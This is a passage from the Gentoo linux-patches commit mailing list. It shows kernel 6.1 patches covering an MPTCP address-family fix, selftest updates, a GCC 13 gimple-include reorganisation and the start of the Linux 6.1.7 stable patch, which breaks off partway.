+ 	u8 pm_type = mptcp_get_pm_type(sock_net((struct sock *)msk));
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 0430415357ba3..c1d6cd5b188c2 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -294,6 +294,13 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 	}
+ 
+ 	sk = &msk->sk.icsk_inet.sk;
++
++	if (!mptcp_pm_addr_families_match(sk, &addr_l, &addr_r)) {
++		GENL_SET_ERR_MSG(info, "families mismatch");
++		err = -EINVAL;
++		goto create_err;
++	}
++
+ 	lock_sock(sk);
+ 
+ 	err = __mptcp_subflow_connect(sk, &addr_l, &addr_r);
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index e97465f0c6672..29849d77e4bf8 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -107,7 +107,7 @@ static int __mptcp_socket_create(struct mptcp_sock *msk)
+ 	struct socket *ssock;
+ 	int err;
+ 
+-	err = mptcp_subflow_create_socket(sk, &ssock);
++	err = mptcp_subflow_create_socket(sk, sk->sk_family, &ssock);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 62e9ff237b6e8..6f22ae13c9848 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -626,7 +626,8 @@ bool mptcp_addresses_equal(const struct mptcp_addr_info *a,
+ /* called with sk socket lock held */
+ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+ 			    const struct mptcp_addr_info *remote);
+-int mptcp_subflow_create_socket(struct sock *sk, struct socket **new_sock);
++int mptcp_subflow_create_socket(struct sock *sk, unsigned short family,
++				struct socket **new_sock);
+ void mptcp_info2sockaddr(const struct mptcp_addr_info *info,
+ 			 struct sockaddr_storage *addr,
+ 			 unsigned short family);
+@@ -761,6 +762,9 @@ int mptcp_pm_parse_addr(struct nlattr *attr, struct genl_info *info,
+ int mptcp_pm_parse_entry(struct nlattr *attr, struct genl_info *info,
+ 			 bool require_family,
+ 			 struct mptcp_pm_addr_entry *entry);
++bool mptcp_pm_addr_families_match(const struct sock *sk,
++				  const struct mptcp_addr_info *loc,
++				  const struct mptcp_addr_info *rem);
+ void mptcp_pm_subflow_chk_stale(const struct mptcp_sock *msk, struct sock *ssk);
+ void mptcp_pm_nl_subflow_chk_stale(const struct mptcp_sock *msk, struct sock *ssk);
+ void mptcp_pm_new_connection(struct mptcp_sock *msk, const struct sock *ssk, int server_side);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 9d3701fdb2937..5220435d8e34d 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1492,7 +1492,7 @@ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+ 	if (!mptcp_is_fully_established(sk))
+ 		goto err_out;
+ 
+-	err = mptcp_subflow_create_socket(sk, &sf);
++	err = mptcp_subflow_create_socket(sk, loc->family, &sf);
+ 	if (err)
+ 		goto err_out;
+ 
+@@ -1604,7 +1604,9 @@ static void mptcp_subflow_ops_undo_override(struct sock *ssk)
+ #endif
+ 		ssk->sk_prot = &tcp_prot;
+ }
+-int mptcp_subflow_create_socket(struct sock *sk, struct socket **new_sock)
++
++int mptcp_subflow_create_socket(struct sock *sk, unsigned short family,
++				struct socket **new_sock)
+ {
+ 	struct mptcp_subflow_context *subflow;
+ 	struct net *net = sock_net(sk);
+@@ -1617,8 +1619,7 @@ int mptcp_subflow_create_socket(struct sock *sk, struct socket **new_sock)
+ 	if (unlikely(!sk->sk_socket))
+ 		return -EINVAL;
+ 
+-	err = sock_create_kern(net, sk->sk_family, SOCK_STREAM, IPPROTO_TCP,
+-			       &sf);
++	err = sock_create_kern(net, family, SOCK_STREAM, IPPROTO_TCP, &sf);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/tools/testing/memblock/.gitignore b/tools/testing/memblock/.gitignore
+index 654338e0be52e..4cc7cd5aac2b1 100644
+--- a/tools/testing/memblock/.gitignore
++++ b/tools/testing/memblock/.gitignore
+@@ -1,4 +1,5 @@
+ main
+ memblock.c
+ linux/memblock.h
++asm/asm.h
+ asm/cmpxchg.h
+diff --git a/tools/testing/memblock/Makefile b/tools/testing/memblock/Makefile
+index 246f7ac8489b4..575e98fddc21c 100644
+--- a/tools/testing/memblock/Makefile
++++ b/tools/testing/memblock/Makefile
+@@ -29,13 +29,14 @@ include: ../../../include/linux/memblock.h ../../include/linux/*.h \
+ 
+ 	@mkdir -p linux
+ 	test -L linux/memblock.h || ln -s ../../../../include/linux/memblock.h linux/memblock.h
++	test -L asm/asm.h || ln -s ../../../arch/x86/include/asm/asm.h asm/asm.h
+ 	test -L asm/cmpxchg.h || ln -s ../../../arch/x86/include/asm/cmpxchg.h asm/cmpxchg.h
+ 
+ memblock.c: $(EXTR_SRC)
+ 	test -L memblock.c || ln -s $(EXTR_SRC) memblock.c
+ 
+ clean:
+-	$(RM) $(TARGETS) $(OFILES) linux/memblock.h memblock.c asm/cmpxchg.h
++	$(RM) $(TARGETS) $(OFILES) linux/memblock.h memblock.c asm/asm.h asm/cmpxchg.h
+ 
+ help:
+ 	@echo  'Memblock simulator'
+diff --git a/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c b/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c
+new file mode 100644
+index 0000000000000..3add34df57678
+--- /dev/null
++++ b/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c
+@@ -0,0 +1,9 @@
++// SPDX-License-Identifier: GPL-2.0
++
++#include <test_progs.h>
++#include "jeq_infer_not_null_fail.skel.h"
++
++void test_jeq_infer_not_null(void)
++{
++	RUN_TESTS(jeq_infer_not_null_fail);
++}
+diff --git a/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c b/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c
+new file mode 100644
+index 0000000000000..f46965053acb2
+--- /dev/null
++++ b/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c
+@@ -0,0 +1,42 @@
++// SPDX-License-Identifier: GPL-2.0
++
++#include "vmlinux.h"
++#include <bpf/bpf_helpers.h>
++#include "bpf_misc.h"
++
++char _license[] SEC("license") = "GPL";
++
++struct {
++	__uint(type, BPF_MAP_TYPE_HASH);
++	__uint(max_entries, 1);
++	__type(key, u64);
++	__type(value, u64);
++} m_hash SEC(".maps");
++
++SEC("?raw_tp")
++__failure __msg("R8 invalid mem access 'map_value_or_null")
++int jeq_infer_not_null_ptr_to_btfid(void *ctx)
++{
++	struct bpf_map *map = (struct bpf_map *)&m_hash;
++	struct bpf_map *inner_map = map->inner_map_meta;
++	u64 key = 0, ret = 0, *val;
++
++	val = bpf_map_lookup_elem(map, &key);
++	/* Do not mark ptr as non-null if one of them is
++	 * PTR_TO_BTF_ID (R9), reject because of invalid
++	 * access to map value (R8).
++	 *
++	 * Here, we need to inline those insns to access
++	 * R8 directly, since compiler may use other reg
++	 * once it figures out val==inner_map.
++	 */
++	asm volatile("r8 = %[val];\n"
++		     "r9 = %[inner_map];\n"
++		     "if r8 != r9 goto +1;\n"
++		     "%[ret] = *(u64 *)(r8 +0);\n"
++		     : [ret] "+r"(ret)
++		     : [inner_map] "r"(inner_map), [val] "r"(val)
++		     : "r8", "r9");
++
++	return ret;
++}
+diff --git a/tools/testing/selftests/net/cmsg_sender.c b/tools/testing/selftests/net/cmsg_sender.c
+index 75dd83e39207b..24b21b15ed3fb 100644
+--- a/tools/testing/selftests/net/cmsg_sender.c
++++ b/tools/testing/selftests/net/cmsg_sender.c
+@@ -110,7 +110,7 @@ static void __attribute__((noreturn)) cs_usage(const char *bin)
+ 
+ static void cs_parse_args(int argc, char *argv[])
+ {
+-	char o;
++	int o;
+ 
+ 	while ((o = getopt(argc, argv, "46sS:p:m:M:d:tf:F:c:C:l:L:H:")) != -1) {
+ 		switch (o) {
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index 3229725b64b0a..0040e3bc7b16e 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -776,6 +776,52 @@ test_subflows()
+ 	rm -f "$evts"
+ }
+ 
++test_subflows_v4_v6_mix()
++{
++	# Attempt to add a listener at 10.0.2.1:<subflow-port>
++	ip netns exec "$ns1" ./pm_nl_ctl listen 10.0.2.1\
++	   $app6_port > /dev/null 2>&1 &
++	local listener_pid=$!
++
++	# ADD_ADDR4 from server to client machine reusing the subflow port on
++	# the established v6 connection
++	:>"$client_evts"
++	ip netns exec "$ns1" ./pm_nl_ctl ann 10.0.2.1 token "$server6_token" id\
++	   $server_addr_id dev ns1eth2 > /dev/null 2>&1
++	stdbuf -o0 -e0 printf "ADD_ADDR4 id:%d 10.0.2.1 (ns1) => ns2, reuse port\t\t" $server_addr_id
++	sleep 0.5
++	verify_announce_event "$client_evts" "$ANNOUNCED" "$client6_token" "10.0.2.1"\
++			      "$server_addr_id" "$app6_port"
++
++	# CREATE_SUBFLOW from client to server machine
++	:>"$client_evts"
++	ip netns exec "$ns2" ./pm_nl_ctl csf lip 10.0.2.2 lid 23 rip 10.0.2.1 rport\
++	   $app6_port token "$client6_token" > /dev/null 2>&1
++	sleep 0.5
++	verify_subflow_events "$client_evts" "$SUB_ESTABLISHED" "$client6_token"\
++			      "$AF_INET" "10.0.2.2" "10.0.2.1" "$app6_port" "23"\
++			      "$server_addr_id" "ns2" "ns1"
++
++	# Delete the listener from the server ns, if one was created
++	kill_wait $listener_pid
++
++	sport=$(sed --unbuffered -n 's/.*\(sport:\)\([[:digit:]]*\).*$/\2/p;q' "$client_evts")
++
++	# DESTROY_SUBFLOW from client to server machine
++	:>"$client_evts"
++	ip netns exec "$ns2" ./pm_nl_ctl dsf lip 10.0.2.2 lport "$sport" rip 10.0.2.1 rport\
++	   $app6_port token "$client6_token" > /dev/null 2>&1
++	sleep 0.5
++	verify_subflow_events "$client_evts" "$SUB_CLOSED" "$client6_token" \
++			      "$AF_INET" "10.0.2.2" "10.0.2.1" "$app6_port" "23"\
++			      "$server_addr_id" "ns2" "ns1"
++
++	# RM_ADDR from server to client machine
++	ip netns exec "$ns1" ./pm_nl_ctl rem id $server_addr_id token\
++	   "$server6_token" > /dev/null 2>&1
++	sleep 0.5
++}
++
+ test_prio()
+ {
+ 	local count
+@@ -812,6 +858,7 @@ make_connection "v6"
+ test_announce
+ test_remove
+ test_subflows
++test_subflows_v4_v6_mix
+ test_prio
+ 
+ exit 0
+diff --git a/tools/testing/selftests/proc/proc-empty-vm.c b/tools/testing/selftests/proc/proc-empty-vm.c
+index d95b1cb43d9d0..7588428b8fcd7 100644
+--- a/tools/testing/selftests/proc/proc-empty-vm.c
++++ b/tools/testing/selftests/proc/proc-empty-vm.c
+@@ -25,6 +25,7 @@
+ #undef NDEBUG
+ #include <assert.h>
+ #include <errno.h>
++#include <stdint.h>
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <string.h>
+@@ -41,7 +42,7 @@
+  * 1: vsyscall VMA is --xp		vsyscall=xonly
+  * 2: vsyscall VMA is r-xp		vsyscall=emulate
+  */
+-static int g_vsyscall;
++static volatile int g_vsyscall;
+ static const char *g_proc_pid_maps_vsyscall;
+ static const char *g_proc_pid_smaps_vsyscall;
+ 
+@@ -147,11 +148,12 @@ static void vsyscall(void)
+ 
+ 		g_vsyscall = 0;
+ 		/* gettimeofday(NULL, NULL); */
++		uint64_t rax = 0xffffffffff600000;
+ 		asm volatile (
+-			"call %P0"
+-			:
+-			: "i" (0xffffffffff600000), "D" (NULL), "S" (NULL)
+-			: "rax", "rcx", "r11"
++			"call *%[rax]"
++			: [rax] "+a" (rax)
++			: "D" (NULL), "S" (NULL)
++			: "rcx", "r11"
+ 		);
+ 
+ 		g_vsyscall = 1;
+diff --git a/tools/testing/selftests/proc/proc-pid-vm.c b/tools/testing/selftests/proc/proc-pid-vm.c
+index 69551bfa215c4..cacbd2a4aec91 100644
+--- a/tools/testing/selftests/proc/proc-pid-vm.c
++++ b/tools/testing/selftests/proc/proc-pid-vm.c
+@@ -257,11 +257,12 @@ static void vsyscall(void)
+ 
+ 		g_vsyscall = 0;
+ 		/* gettimeofday(NULL, NULL); */
++		uint64_t rax = 0xffffffffff600000;
+ 		asm volatile (
+-			"call %P0"
+-			:
+-			: "i" (0xffffffffff600000), "D" (NULL), "S" (NULL)
+-			: "rax", "rcx", "r11"
++			"call *%[rax]"
++			: [rax] "+a" (rax)
++			: "D" (NULL), "S" (NULL)
++			: "rcx", "r11"
+ 		);
+ 
+ 		g_vsyscall = 1;
+diff --git a/tools/virtio/vringh_test.c b/tools/virtio/vringh_test.c
+index fa87b58bd5fa5..98ff808d6f0c2 100644
+--- a/tools/virtio/vringh_test.c
++++ b/tools/virtio/vringh_test.c
+@@ -308,6 +308,7 @@ static int parallel_test(u64 features,
+ 
+ 		gvdev.vdev.features = features;
+ 		INIT_LIST_HEAD(&gvdev.vdev.vqs);
++		spin_lock_init(&gvdev.vdev.vqs_list_lock);
+ 		gvdev.to_host_fd = to_host[1];
+ 		gvdev.notifies = 0;
+ 
+@@ -455,6 +456,7 @@ int main(int argc, char *argv[])
+ 	getrange = getrange_iov;
+ 	vdev.features = 0;
+ 	INIT_LIST_HEAD(&vdev.vqs);
++	spin_lock_init(&vdev.vqs_list_lock);
+ 
+ 	while (argv[1]) {
+ 		if (strcmp(argv[1], "--indirect") == 0)


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-22 14:59 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-22 14:59 UTC (permalink / raw
  To: gentoo-commits

commit:     f659ca60651a53d186ce854c3eefa8ad024cd0ba
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Jan 22 14:59:31 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Jan 22 14:59:31 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=f659ca60

gcc-plugins: Reorganize gimple includes for GCC 13

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 +++
 ..._gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch | 41 ++++++++++++++++++++++
 2 files changed, 45 insertions(+)

diff --git a/0000_README b/0000_README
index eb8a606b..b3e83a42 100644
--- a/0000_README
+++ b/0000_README
@@ -103,6 +103,10 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
+Patch:	2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
+From:   https://lore.kernel.org/lkml/mhng-8bc81919-3023-4d72-bd44-2443606b4fd7@palmer-ri-x1c9a/T/
+Desc:   gcc-plugins: Reorganize gimple includes for GCC 13
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch b/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
new file mode 100644
index 00000000..0b454ec8
--- /dev/null
+++ b/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
@@ -0,0 +1,41 @@
+gcc-plugins: Reorganize gimple includes for GCC 13
+
+The gimple-iterator.h header must be included before gimple-fold.h
+starting with GCC 13. Reorganize gimple headers to work for all GCC
+versions.
+
+Reported-by: Palmer Dabbelt <palmer@rivosinc.com>
+Link: https://lore.kernel.org/all/20230113173033.4380-1-palmer@rivosinc.com/
+Cc: linux-hardening@vger.kernel.org
+Signed-off-by: Kees Cook <keescook@chromium.org>
+---
+ scripts/gcc-plugins/gcc-common.h | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
+index 9a1895747b15..84c730da36dd 100644
+--- a/scripts/gcc-plugins/gcc-common.h
++++ b/scripts/gcc-plugins/gcc-common.h
+@@ -71,7 +71,9 @@
+ #include "varasm.h"
+ #include "stor-layout.h"
+ #include "internal-fn.h"
++#include "gimple.h"
+ #include "gimple-expr.h"
++#include "gimple-iterator.h"
+ #include "gimple-fold.h"
+ #include "context.h"
+ #include "tree-ssa-alias.h"
+@@ -85,10 +87,8 @@
+ #include "tree-eh.h"
+ #include "stmt.h"
+ #include "gimplify.h"
+-#include "gimple.h"
+ #include "tree-phinodes.h"
+ #include "tree-cfg.h"
+-#include "gimple-iterator.h"
+ #include "gimple-ssa.h"
+ #include "ssa-iterators.h"
+ 
+-- 
+2.34.1


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-18 11:29 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-18 11:29 UTC (permalink / raw
  To: gentoo-commits

commit:     3a4f90d35a846c31efef8d7280e2ca565d778f07
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jan 18 11:29:44 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jan 18 11:29:44 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3a4f90d3

Linux patch 6.1.7

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |     4 +
 1006_linux-6.1.7.patch | 10521 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 10525 insertions(+)

diff --git a/0000_README b/0000_README
index 9e9a8d04..eb8a606b 100644
--- a/0000_README
+++ b/0000_README
@@ -67,6 +67,10 @@ Patch:  1005_linux-6.1.6.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.6
 
+Patch:  1006_linux-6.1.7.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.7
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1006_linux-6.1.7.patch b/1006_linux-6.1.7.patch
new file mode 100644
index 00000000..9c382dc8
--- /dev/null
+++ b/1006_linux-6.1.7.patch
@@ -0,0 +1,10521 @@
+diff --git a/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml b/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
+index 3b609c19e0bc4..6c5b4783812ae 100644
+--- a/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
++++ b/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
+@@ -32,7 +32,7 @@ properties:
+       - description: Display byte clock
+       - description: Display byte interface clock
+       - description: Display pixel clock
+-      - description: Display escape clock
++      - description: Display core clock
+       - description: Display AHB clock
+       - description: Display AXI clock
+ 
+@@ -134,8 +134,6 @@ required:
+   - phy-names
+   - assigned-clocks
+   - assigned-clock-parents
+-  - power-domains
+-  - operating-points-v2
+   - ports
+ 
+ additionalProperties: false
+diff --git a/Documentation/devicetree/bindings/display/msm/dsi-phy-10nm.yaml b/Documentation/devicetree/bindings/display/msm/dsi-phy-10nm.yaml
+index d9ad8b659f58e..3ec466c3ab38b 100644
+--- a/Documentation/devicetree/bindings/display/msm/dsi-phy-10nm.yaml
++++ b/Documentation/devicetree/bindings/display/msm/dsi-phy-10nm.yaml
+@@ -69,7 +69,6 @@ required:
+   - compatible
+   - reg
+   - reg-names
+-  - vdds-supply
+ 
+ unevaluatedProperties: false
+ 
+diff --git a/Documentation/devicetree/bindings/display/msm/dsi-phy-14nm.yaml b/Documentation/devicetree/bindings/display/msm/dsi-phy-14nm.yaml
+index 1342d74ecfe0f..0a7b5f110d885 100644
+--- a/Documentation/devicetree/bindings/display/msm/dsi-phy-14nm.yaml
++++ b/Documentation/devicetree/bindings/display/msm/dsi-phy-14nm.yaml
+@@ -38,7 +38,6 @@ required:
+   - compatible
+   - reg
+   - reg-names
+-  - vcca-supply
+ 
+ unevaluatedProperties: false
+ 
+diff --git a/Documentation/devicetree/bindings/display/msm/dsi-phy-28nm.yaml b/Documentation/devicetree/bindings/display/msm/dsi-phy-28nm.yaml
+index 3d8540a06fe22..2f1fd140c87df 100644
+--- a/Documentation/devicetree/bindings/display/msm/dsi-phy-28nm.yaml
++++ b/Documentation/devicetree/bindings/display/msm/dsi-phy-28nm.yaml
+@@ -34,6 +34,10 @@ properties:
+   vddio-supply:
+     description: Phandle to vdd-io regulator device node.
+ 
++  qcom,dsi-phy-regulator-ldo-mode:
++    type: boolean
++    description: Indicates if the LDO mode PHY regulator is wanted.
++
+ required:
+   - compatible
+   - reg
+diff --git a/Documentation/gpu/todo.rst b/Documentation/gpu/todo.rst
+index 393d218e4a0cf..b2c6aaf1edf27 100644
+--- a/Documentation/gpu/todo.rst
++++ b/Documentation/gpu/todo.rst
+@@ -651,17 +651,6 @@ See drivers/gpu/drm/amd/display/TODO for tasks.
+ 
+ Contact: Harry Wentland, Alex Deucher
+ 
+-vmwgfx: Replace hashtable with Linux' implementation
+-----------------------------------------------------
+-
+-The vmwgfx driver uses its own hashtable implementation. Replace the
+-code with Linux' implementation and update the callers. It's mostly a
+-refactoring task, but the interfaces are different.
+-
+-Contact: Zack Rusin, Thomas Zimmermann <tzimmermann@suse.de>
+-
+-Level: Intermediate
+-
+ Bootsplash
+ ==========
+ 
+diff --git a/Documentation/sphinx/load_config.py b/Documentation/sphinx/load_config.py
+index eeb394b39e2cc..8b416bfd75ac1 100644
+--- a/Documentation/sphinx/load_config.py
++++ b/Documentation/sphinx/load_config.py
+@@ -3,7 +3,7 @@
+ 
+ import os
+ import sys
+-from sphinx.util.pycompat import execfile_
++from sphinx.util.osutil import fs_encoding
+ 
+ # ------------------------------------------------------------------------------
+ def loadConfig(namespace):
+@@ -48,7 +48,9 @@ def loadConfig(namespace):
+             sys.stdout.write("load additional sphinx-config: %s\n" % config_file)
+             config = namespace.copy()
+             config['__file__'] = config_file
+-            execfile_(config_file, config)
++            with open(config_file, 'rb') as f:
++                code = compile(f.read(), fs_encoding, 'exec')
++                exec(code, config)
+             del config['__file__']
+             namespace.update(config)
+         else:
+diff --git a/Documentation/virt/kvm/api.rst b/Documentation/virt/kvm/api.rst
+index 896914e3a8475..b8ec88ef2efa2 100644
+--- a/Documentation/virt/kvm/api.rst
++++ b/Documentation/virt/kvm/api.rst
+@@ -8248,6 +8248,20 @@ CPU[EAX=1]:ECX[24] (TSC_DEADLINE) is not reported by ``KVM_GET_SUPPORTED_CPUID``
+ It can be enabled if ``KVM_CAP_TSC_DEADLINE_TIMER`` is present and the kernel
+ has enabled in-kernel emulation of the local APIC.
+ 
++CPU topology
++~~~~~~~~~~~~
++
++Several CPUID values include topology information for the host CPU:
++0x0b and 0x1f for Intel systems, 0x8000001e for AMD systems.  Different
++versions of KVM return different values for this information and userspace
++should not rely on it.  Currently they return all zeroes.
++
++If userspace wishes to set up a guest topology, it should be careful that
++the values of these three leaves differ for each CPU.  In particular,
++the APIC ID is found in EDX for all subleaves of 0x0b and 0x1f, and in EAX
++for 0x8000001e; the latter also encodes the core id and node id in bits
++7:0 of EBX and ECX respectively.
++
+ Obsolete ioctls and capabilities
+ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+ 
+diff --git a/Makefile b/Makefile
+index 19e8c6dec6e54..7eb6793ecfbfd 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 6
++SUBLEVEL = 7
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/include/asm/atomic_ll_sc.h b/arch/arm64/include/asm/atomic_ll_sc.h
+index 0890e4f568fb7..cbb3d961123b1 100644
+--- a/arch/arm64/include/asm/atomic_ll_sc.h
++++ b/arch/arm64/include/asm/atomic_ll_sc.h
+@@ -315,7 +315,7 @@ __ll_sc__cmpxchg_double##name(unsigned long old1,			\
+ 	"	cbnz	%w0, 1b\n"					\
+ 	"	" #mb "\n"						\
+ 	"2:"								\
+-	: "=&r" (tmp), "=&r" (ret), "+Q" (*(unsigned long *)ptr)	\
++	: "=&r" (tmp), "=&r" (ret), "+Q" (*(__uint128_t *)ptr)		\
+ 	: "r" (old1), "r" (old2), "r" (new1), "r" (new2)		\
+ 	: cl);								\
+ 									\
+diff --git a/arch/arm64/include/asm/atomic_lse.h b/arch/arm64/include/asm/atomic_lse.h
+index 52075e93de6c0..a94d6dacc0292 100644
+--- a/arch/arm64/include/asm/atomic_lse.h
++++ b/arch/arm64/include/asm/atomic_lse.h
+@@ -311,7 +311,7 @@ __lse__cmpxchg_double##name(unsigned long old1,				\
+ 	"	eor	%[old2], %[old2], %[oldval2]\n"			\
+ 	"	orr	%[old1], %[old1], %[old2]"			\
+ 	: [old1] "+&r" (x0), [old2] "+&r" (x1),				\
+-	  [v] "+Q" (*(unsigned long *)ptr)				\
++	  [v] "+Q" (*(__uint128_t *)ptr)				\
+ 	: [new1] "r" (x2), [new2] "r" (x3), [ptr] "r" (x4),		\
+ 	  [oldval1] "r" (oldval1), [oldval2] "r" (oldval2)		\
+ 	: cl);								\
+diff --git a/arch/arm64/include/asm/kvm_emulate.h b/arch/arm64/include/asm/kvm_emulate.h
+index 9bdba47f7e149..0d40c48d81329 100644
+--- a/arch/arm64/include/asm/kvm_emulate.h
++++ b/arch/arm64/include/asm/kvm_emulate.h
+@@ -373,8 +373,26 @@ static __always_inline int kvm_vcpu_sys_get_rt(struct kvm_vcpu *vcpu)
+ 
+ static inline bool kvm_is_write_fault(struct kvm_vcpu *vcpu)
+ {
+-	if (kvm_vcpu_abt_iss1tw(vcpu))
+-		return true;
++	if (kvm_vcpu_abt_iss1tw(vcpu)) {
++		/*
++		 * Only a permission fault on a S1PTW should be
++		 * considered as a write. Otherwise, page tables baked
++		 * in a read-only memslot will result in an exception
++		 * being delivered in the guest.
++		 *
++		 * The drawback is that we end-up faulting twice if the
++		 * guest is using any of HW AF/DB: a translation fault
++		 * to map the page containing the PT (read only at
++		 * first), then a permission fault to allow the flags
++		 * to be set.
++		 */
++		switch (kvm_vcpu_trap_get_fault_type(vcpu)) {
++		case ESR_ELx_FSC_PERM:
++			return true;
++		default:
++			return false;
++		}
++	}
+ 
+ 	if (kvm_vcpu_trap_is_iabt(vcpu))
+ 		return false;
+diff --git a/arch/arm64/include/asm/pgtable.h b/arch/arm64/include/asm/pgtable.h
+index edf6625ce9654..f1cfc44ef52fe 100644
+--- a/arch/arm64/include/asm/pgtable.h
++++ b/arch/arm64/include/asm/pgtable.h
+@@ -682,7 +682,7 @@ static inline unsigned long pmd_page_vaddr(pmd_t pmd)
+ #define pud_leaf(pud)		(pud_present(pud) && !pud_table(pud))
+ #define pud_valid(pud)		pte_valid(pud_pte(pud))
+ #define pud_user(pud)		pte_user(pud_pte(pud))
+-
++#define pud_user_exec(pud)	pte_user_exec(pud_pte(pud))
+ 
+ static inline void set_pud(pud_t *pudp, pud_t pud)
+ {
+@@ -863,12 +863,12 @@ static inline bool pte_user_accessible_page(pte_t pte)
+ 
+ static inline bool pmd_user_accessible_page(pmd_t pmd)
+ {
+-	return pmd_leaf(pmd) && (pmd_user(pmd) || pmd_user_exec(pmd));
++	return pmd_leaf(pmd) && !pmd_present_invalid(pmd) && (pmd_user(pmd) || pmd_user_exec(pmd));
+ }
+ 
+ static inline bool pud_user_accessible_page(pud_t pud)
+ {
+-	return pud_leaf(pud) && pud_user(pud);
++	return pud_leaf(pud) && (pud_user(pud) || pud_user_exec(pud));
+ }
+ #endif
+ 
+diff --git a/arch/arm64/kernel/elfcore.c b/arch/arm64/kernel/elfcore.c
+index 27ef7ad3ffd2e..662a61e5e75e4 100644
+--- a/arch/arm64/kernel/elfcore.c
++++ b/arch/arm64/kernel/elfcore.c
+@@ -8,28 +8,27 @@
+ #include <asm/cpufeature.h>
+ #include <asm/mte.h>
+ 
+-#define for_each_mte_vma(vmi, vma)					\
++#define for_each_mte_vma(cprm, i, m)					\
+ 	if (system_supports_mte())					\
+-		for_each_vma(vmi, vma)					\
+-			if (vma->vm_flags & VM_MTE)
++		for (i = 0, m = cprm->vma_meta;				\
++		     i < cprm->vma_count;				\
++		     i++, m = cprm->vma_meta + i)			\
++			if (m->flags & VM_MTE)
+ 
+-static unsigned long mte_vma_tag_dump_size(struct vm_area_struct *vma)
++static unsigned long mte_vma_tag_dump_size(struct core_vma_metadata *m)
+ {
+-	if (vma->vm_flags & VM_DONTDUMP)
+-		return 0;
+-
+-	return vma_pages(vma) * MTE_PAGE_TAG_STORAGE;
++	return (m->dump_size >> PAGE_SHIFT) * MTE_PAGE_TAG_STORAGE;
+ }
+ 
+ /* Derived from dump_user_range(); start/end must be page-aligned */
+ static int mte_dump_tag_range(struct coredump_params *cprm,
+-			      unsigned long start, unsigned long end)
++			      unsigned long start, unsigned long len)
+ {
+ 	int ret = 1;
+ 	unsigned long addr;
+ 	void *tags = NULL;
+ 
+-	for (addr = start; addr < end; addr += PAGE_SIZE) {
++	for (addr = start; addr < start + len; addr += PAGE_SIZE) {
+ 		struct page *page = get_dump_page(addr);
